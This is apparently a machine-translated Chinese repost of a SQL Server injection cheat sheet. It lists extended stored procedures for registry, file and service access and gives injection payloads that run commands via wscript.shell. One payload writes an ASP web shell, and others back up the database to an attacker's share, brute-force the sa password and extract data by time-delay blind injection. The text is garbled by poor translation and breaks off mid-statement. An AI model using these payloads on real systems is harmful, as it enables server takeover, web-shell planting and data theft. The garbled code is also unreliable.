MSSQL injection

xiaoxiao2021-04-05  319

Some sql extension xp_regaddmultistring xp_regdeletekey Delete key to delete the name xp_regdeletevalue key xp_regenumkeys enumerate xp_regenumvalues ​​xp_regread for xp_regremovemultistring xp_regwrite write xp_availablemedia View Drive xp_dirtree see catalog xp_enumdsn ODBC data source xp_loginconfig information xp_makecab some of the security configuration of the server package, some dbo permission to do Dayong XP_NTSEC_ENUMDOMAINS enumeration domain name related information XP_TERMINATE_PROCESS Terminal Process and IP XP_LoginInfo Current login account sp_configure Retrieved content in the database (I think this is useful) sp_helpextendedProc get all stored expansion sp_who2 query users, their logged in host, they execute in the database the operation of some network information like exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM / CurrentControlSet / Services / lanmanserver / parameters', 'nullsessionshares' SNMP auxiliary network Capitol exec xp_regenumvalues ​​HKEY_LOCAL_MACHINE, 'SYSTEM / CurrentControlSet / Services / snmp / parameters / validcomm unities' start number system services, such as telnet, provided hope that some systems can run admin or password exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server' Sp_addextendedproc 'xp_webserver', 'c: / temp / xp_foo.dll 'This extension can run the program with the' Bulk Insert 'syntax to insert a text file into a temporary table. Simply create this table: create Table Foo (Line VARCHAR (8000)) Then perform BULK INSERT operation to insert the data in the file into the table, such as: bulk insert foo from 'c: /inetpub/wwwroot/admin/inc.asp 'bcp "select * from text..foo" queryout c: /inetpub/wwroot/runcommand.asp -c -slocalhost -usa -pfoobar' s 'parameter is the server that execute queries,' u 'parameters are user name,' P The 'parameter is a password, here for several built-in storage procedures for "Foobar' SQL Server" SQL Server. These scripts and scripts running under the Windows script interpreter, or the ASP script - they use VBScript or JavaScript, and they create automatic execution objects and interact with them.

An automatic execution script uses this method Writing You can do anything in the ASP script in Transact-SQL, or anything you can do in the WSH script uses the 'wscript.shell' object: Declare @o int Exec sp_oacreate 'wscript.shell', @ o Out EXEC SP_OAMETHOD @ O, 'Run', NULL, 'NOTEPAD.EXE' Specifies to execute it after the username: username: '; declare @o int exec sp_oacreate' wscript.shell ', @ o Out EXEC SP_OAMETHOD @ o,' Run ', NULL,' NOTEPAD.EXE '- Read a known text file using FSO: Declare @o int, @f int, @t int, @ret int declare @ line varchar (8000) exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c: /boot.ini', 1 exec @ret = sp_oamethod @f, 'readline' @Line out while (@ret = 0) Begin print @line eXec @Ret = sp_oamethod @f, 'readline', @line out end created a user who can perform by submitted, default is the user of the ASP group Run, premise is sp_oacreate extension existed declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.FilesystemObject', @o out exec sp_oamethod @o, 'createtetextfile', @f out, 'C: /inetpub/wwwroot/foo.asp ', 1 exec @ret = sp_oamethod @f,' writeline ', null,' <% set o = server.createObject ("wscript.shell"): o.run (Request.Q UeryString ("cmd"))%> 'sp_who' 1 'Select * from sysobjects For local area network penetration, backup diamond or non-SA user declare @A = db_name (); backup database @a to disk = you IP Your Shared Directory Bak.dat, Name = TEST; - The current database back up to your hard drive SELECT * from OpenRowSet (SQLOLDB, MyServer; sa; select * from table), you need to support more than default The statement query adds a login to make it a member of the fixed server role.

Syntax sp_addsrvrolemember [@loginame =] 'login' [@RoleName =] 'role' parameter [@loginame =] 'login' is the login name added to the fixed server role. Login's data type is sysname, no default. Can be a Microsoft? SQL Server? Login or Microsoft Windows NT? user account. If you haven't logged in to SQL Server access to the Windows NT yet, you will be automatically granted access to access. [@roleName =] 'role' The name of the fixed server role added to log in. The Role data type is sysname, the default value is null, it must be one of the following values: Sysadmin securityadmin serveradmin setupadmin processadmin Diskadmin dbcreator bulkadmin Returns Code value 0 (success) or 1 (fail) Note When logging in to a fixed server role This login will receive permissions related to this fixed server role. You cannot change the role membership of SA login. Use sp_addroleMember to add members to a fixed database role or user-defined role. The sp_addsrvroleMember stored procedure cannot be executed within the user-defined transaction. Members of the Permissions sysadmin fixed server can add members to any fixed server role. Members of the fixed server role can perform SP_ADDSRVROLEMEMBER to add only members only to the same fixed server role. Example The following example adds Windows NT User Corporate / Helens into the sysadmin fixed server role. EXEC SP_ADDSRVROLEMEMBER 'CORPORATE / Helens', 'sysadmin' OpenDataSource does not use the link server name, and provides special connection information and as part of the four-part object name. Syntax OpenDataSource (provider_name, init_string) Parameter provider_name is registered as the name of the ProgID of the OLE DB provider for accessing the data source. The data type of Provider_name is char, no default. Init_string connection string, these strings will be passed to the iDataInitialize interface for the target provider. Provider string syntax is based on keyword value, these keyword values ​​are separated by semicolons, such as "keyword1 = value; keyword2 = value." Defined basic syntax in Microsoft? Data Access SDK. For information on the supported specific keyword values, see the documentation in the provider. The following table lists the most commonly used keywords in the init_string parameter. Keyword OLE DB attribute valid value and describes the name of the data source to be connected to the data source dbprop_init_datasource. Different providers explain this with different methods. This indicates the name of the server for the SQL Server OLE DB provider. This will indicate the full path of the .mdb file or .xls file for the Jet OLE DB provider. The location of the database to which you want to connect. Extended attribute dbprop_init_providerstring provides a specific connection string.

Connection timeout DBPROP_INIT_TIMEOUT Timeout value, after the timeout value, the connection attempt will fail. User ID DBPROP_AUTH_USERID User ID is used for the connection. Password dbprop_auth_password is used for the password for the connection. The directory dbprop_init_catalog is connected to the initial or default directory name when the data source is connected. The OpenDataSource function can be used in the same Transact-SQL syntax location that is capable of using the link server name. Therefore, OpenDataSource can be used as the first part of the four-part name, which refers to the name of the table or view in the SELECT, INSERT, UPDATE, or DELETE statement; or refers to the remote stored procedure in the Execute statement. When performing a remote stored procedure, OpenDataSource should refer to another SQL Server. OpenDataSource does not accept parameter variables. Similar to the OpenRowSet function, OpenDataSource should only reference those OLE DB data sources that are not regularly accessed. For any data source that is slightly more than the number of access times, please define the link to the server. Regardless of OpenDataSource or OpenRowSet, you cannot provide all features of the link server definition, such as security management, and ability to query directory information. All connection information (including passwords) must be provided each time you call OpenDataSource. Example The following example accesses data from a table, which is in another instance of SQL Server. Select * from OpenDataSource ('sqloledb', 'data source = servername; user ID = myuid; password = mypass') .northwind.dbo.categories Below is an example of a query, which ques query Excel Electronics through the OLE DB provider for Jet form.

Select * from OpenDataSource ('microsoft.jet.oledb.4.0', 'data source = "c: /finance/account.xls"; user ID = admin; password =; extended profits = excel 5.0') ... xactions Msdasql is established by the stored procedure, in the BlackBox test, it seems that there is no injection difference Declare @uSername nVarchar (4000), @query nvarchar (4000) Declare @pwd nvarchar (4000), @char_set nvarchar (4000) declare @pwd_len ! int, @i int, @c char select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789 _ 'select @pwd_len = 8 select @username =' sa 'while @i <@pwd_len begin - make pwd (code deleted) - try a Login select @query = N'SELECT * from OpenRowSet ('' msdasql '', '' driver = {sql server}; server =; uid = ' @username n'; PWD = ' @pwd n' ' ',' SELECT @@ Version '') 'EXEC XP_EXECRESULTSET @Query, N'Master' - CHECK for SUCCESS - INCREMENT The Password (Code Deleted) End Blind Skills, Time Delay (You can Add a loop function, the longer the inquiry time, the longer say the current field is correct) IF (select user) = 'sa' waitfor delay '0: 0: 5' if exists (SELECT * from Pubs..pub_info) Waitfor delay '0: 0 : 5 'Create Table Pub..tmp_file (IS_FILE INT, IS_DIR INT, HAS_PARENT INT) INSERT INTO PUBS..TMP_FILE EXEC MASTER..XP_FILEXIST 'C: /BOOT.INI' IF EXISTS (SELECT * from Pubs..tmp_file) Waitfor Delay '0: 0: 5' IF (SELECT IS_FILE FROM PUBS ..tmp_file)> 0 Waitfor Delay '0: 0: 5' Character Contrast IF (ASCII (Substring (@S, @BYTE, 1)) & (Power (2, @BIT)))> 0 Waitfor Delay '0: 0: 5 'declare @s varchar (8000) SELECT @S =

转载请注明原文地址:https://www.9cbs.com/read-132240.html

New Post(0)